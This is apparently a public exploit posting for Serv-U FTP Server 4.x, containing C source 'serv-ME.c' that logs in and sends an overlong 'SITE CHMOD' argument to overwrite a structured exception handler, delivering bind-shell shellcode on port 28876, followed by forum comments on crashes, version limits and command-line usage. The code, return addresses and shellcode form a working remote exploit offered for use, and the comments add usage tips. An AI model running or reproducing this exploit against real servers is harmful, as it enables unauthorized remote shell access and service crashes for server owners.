By SkyLined


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 8.0 - not licensed for commercial use: www.pgp.com
Comment: Berend-Jan Wever - skylined@edup.tudelft.nl

mQGiBD//MyARBADnHLyg2lUBEddhdWAVBxovYU5PetLk2y3HZKguauHS6tT7sNPb
WR4JuRZ5G9uTkgS/JlVl8jhdvAfOhAsXnlSwfBljPSt7ylHkmG/0TUQV14+OVIks
joq80V2yGNT8oRGC/HMk6d20THXFsqiE8pLF5OVdcF0PpTP14OeavvWp2QCg/2Yb
nk1i1VSjOCmPudJ+7klQbI0D/3pRkXQofpYslG7hBaEndDOVFRo9rgF5D4cbmIo0
eH9LEtzHiB+Q1wgJ2CUxWQeYtqCE5upBOl5vwnlY86vH6QdxZ7JdOhyWU2bgbb+D
xZrWgE1LibVdqC6ow2NgmCTQhvnBVpuvrpfe50iohujCzzI4n8Vwolg4jQtCmsU/
2glaA/9vM9T09rlq0CMQnwI3o1WPuyaVd2RrODo8AScKmYkukiuOCF7HSB//hGOX
1HXkM+yRi7ZtGVuX2sY2wkjiZa1OUuL28I5FInJQxoS8FuMtlEY2vqVHcw01KL3O
NQPvVMNoieKM3hrLGUNTgvsiGEFZYzp908bvicGh3c1yrbo6XLQrQmVyZW5kLUph
biBXZXZlciA8c2t5bGluZWRAZWR1cC50dWRlbGZ0Lm5sPokAWAQQEQIAGAUCP/8z
IAgLCQgHAwIBCgIZAQUbAwAAAAAKCRDnF8rcdEbf3T07AKDQp2C/tLe5X8v1iUBa
TlEogOUvrQCg7SHA3QPk2f/6wnl9sqhADvXdS1W5Ag0EP/8zIBAIAPZCV7cIfwgX
cqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyD
vWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5
u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98
iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlA
GBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqr
ol7DVekyCzsAAgIIAPBwtE5Q5qtEuK/1a7rNrHvRTpgTJpw9P6B61TfGACiucXne
Xo28DbabGuD8yfiNaXTHKt9NAtfHxVTL1hFUIfK5dZ9o6FG4pJFZtXfjmGqoac6A
G2zBNWNAr26OqoEKrFohJyJ8rcIY+FKrH5axaBc9II5cxcQebWoFXU/tGq+4yVaZ
4669mfHBSfiThe4N1hlcrlcehxUe3QFZYmQHYClXpldY0t3/N71k5jd6a1NZ5j9Z
kfTBzXTtbKERt1mM9gptU4LjGJQFoNBw6dRj+IQc4wJG6nAmKaQpOwMdPnii8Kz1
i+MRkW92vt8bfcXqA38XcASI5iqKmQCSSYoBW0qJAEwEGBECAAwFAj//MyAFGwwA
AAAACgkQ5xfK3HRG391CBgCffzGf174a1bKMu4EbOFfrD9eyj90An14tyn0tPGg5
IlutbA2EL52jJYz2
=OpSl
-----END PGP PUBLIC KEY BLOCK-----

------=_NextPart_000_0010_01C3E759.13D55700
Content-Type: application/octet-stream;
name="serv-ME.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="serv-ME.c"

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define exploit_length 511
#define NOP 'A'

#define SEH_handler_offset 400
char* SEH_handler =3D "\x41\x41\xEB\x04"; // 3) jmp over next four =
bytes
char* retaddress_4004 =3D "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
char* retaddress_4100 =3D "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
char* retaddress_4103 =3D "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b

char* shellcode =3D=20
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a"
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb"
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0"
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44"
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b"
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff"
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff"
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0"
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";

int sock;
FILE* FILEsock;
int doubling;

void send_command(char *command, char *arguments) {
int i;
send(sock, command, strlen(command), 0);
send(sock, " ", 1, 0);
for (i=3D0; i<strlen(arguments); i++) {
send(sock, arguments+i, 1, 0);
if (doubling && arguments[i] =3D=3D '\xff') send(sock, arguments+i, =
1, 0);
}
send(sock, "\x0a\x0d", 2, 0);
}

int main(int argc, char *argv[], char *envp[]) {
struct sockaddr_in addr;
char *outbuffer, inbuffer[256];
char *retaddress =3D NULL;
char *version =3D NULL;

if (argc<5) {
printf("Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\n", =
argv[0]);
exit(-1);
}

printf("- Serv-ME =
----------------------------------------------------\n"
" Serv-U v4.x \"site chmod\" exploit.\n"
" Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
" Credits for the vulnerability go to ICBM =
<icbm@0x557.net>.\n"
" Thanks to H D Moore for the shellcode =
(www.metasploit.com).\n"
" Greets to everyone at 0dd and #netric.\n"
" (K)(L)(F) for Suzan.\n"
"\n"
" Binds a shell at %s:28876 if successfull.\n"
" Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\n"
=
"--------------------------------------------------------------\n",
argv[1]);

addr.sin_family =3D AF_INET;
addr.sin_port =3D htons(atoi(argv[2]));
addr.sin_addr.s_addr =3D inet_addr(argv[1]);

printf("\n[+] Connecting to %s:%s...\n", argv[1], argv[2]);
if ((sock =3D socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) =3D=3D -1) {
perror("Socket creation failed");
exit(-1);
}
if (connect(sock, (struct sockaddr *)&addr, sizeof addr) =3D=3D -1) {
perror("Connection failed");
exit(-1);
}
FILEsock =3D fdopen(sock, "r");
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
if (strstr(inbuffer, "220 Serv-U FTP Server v4.") !=3D inbuffer) {
printf("[-] This is not a Serv-U v4.X ftp server.\n");
exit(-1);
}
if (strstr(inbuffer, "v4.1") > 0) {
retaddress =3D retaddress_4103;
version =3D "4.1.0.3";
}

printf("\n[+] Login in as %s:%s...\n", argv[3], argv[4]);
send_command("USER", argv[3]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
send_command("PASS", argv[4]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
if (strstr(inbuffer, "230") !=3D inbuffer) {
printf("[-] Login failed.\n");
exit(-1);
}

if (argv[5]) {
printf("\n[+] Changing directory...\n");
send_command("CD", argv[5]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
}

outbuffer =3D (char*) malloc(exploit_length + strlen(shellcode));
memset(outbuffer, NOP, exploit_length);
memcpy(outbuffer+exploit_length, shellcode, strlen(shellcode));

printf("\n[+] Checking if \\xff doubling is nescesary: ");
send_command("SITE CHMOD 477", "-\xff\xff-");
fgets(inbuffer, sizeof inbuffer, FILEsock);
if (strchr(inbuffer, '\xff') =3D=3D strrchr(inbuffer, '\xff')) {
doubling =3D 1;
printf("Yes.");
retaddress =3D retaddress_4004;
version =3D "4.0.0.4";
} else {
printf("No.");
if (retaddress=3D=3DNULL) {
retaddress =3D retaddress_4100;
version =3D "4.1.0.0";
}
}
printf("\n[+] Serv-U FTP server version %s: using retaddress 0x%08x",
version, *(int*)retaddress);
memcpy(outbuffer + SEH_handler_offset, SEH_handler, =
strlen(SEH_handler));
memcpy(outbuffer + SEH_handler_offset + 4, retaddress, =
strlen(retaddress));

printf("\n[+] Sending exploit... ");
send_command("SITE CHMOD 477", outbuffer);
printf("send, you can now try to connect to %s:28876.\n", argv[1]);
printf(" --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
close(socket);
printf("\n[+] Done. \n");
}

Lot of little errors, Fixed and Removed the banner check stopping you from trying the exploit if Serv-U banner isn't default.

doesnt work....

it crash.... the application needs cygwin1.dll

Doesn't work on Windows XP SP1, crashes Serv-u after exploitation. (tested on Serv-U 4.0.0.4)

i tried your .exe
and i compiled my

it crashes ...... info

Windows Xp SP0

i tested on : Serv-u v3.0 & 4.1.0.0




sends

i meant the one u compiled

my local serv-u is crached.. but no shell ;/

first, tnx for the info.
2 - i try to do that on my stro but it crash and don't gives shell :\

IF anyone knows how this exploit works pls tell I think there must be something special noone thinks of or sth else.

Doesn't work for me ither. Really seems that the recent Serv-U exploits don't seem to work All of them

please guyz bare with me...but can someone tell me how to use this exploit..or give me a link where i know how to use it..coz of one of my sites were stolen by thi sexploit..so i wanna know how it works and how to use it..
thank u so much

i don't get it, if you got write axx and the admin / password why the hell do you need a exploit to crash it then ?

just disabled it or whatever

well,
it seemd to be working here since i logged in succesdfully and it said i could connect to the shell but then i discovered that the whole pc crashed :S

hope this can be fixed soon


as for me, i will wait and test for you guys!

first thx a lot for this exploit but it's very stupid but what do i put for directories because i put simply / and it answer connection failed : cannot assign requested address
thx a lot +

tnx alot m8

but this exploit sometimes crash the server and you won't get a shell

Yeah, I've tried several different versions of this exploit and all seem to just crash servu, with no indication of a shell.

I had test it to, but i didn´t get a shell!

just type :servu -h ************ -t 2 -u anonymous -p blah@blah.com -d 53
you will get shell.....
i have test it and 100% success......

why are ppl posting variants on the last post on servu exploit. The last one works!!! no need for this again.

to use it make sure your router is on DMZ mode, and firewall off. otherwise rev con shell wont work.

it only works on pre 5.0 servu. on 5.0 it will only crash servu, not give shell.

syntax:

servu -h ipaddress -P portofftp -t2 -u "user" -p "pass" -d 53

hope this helps.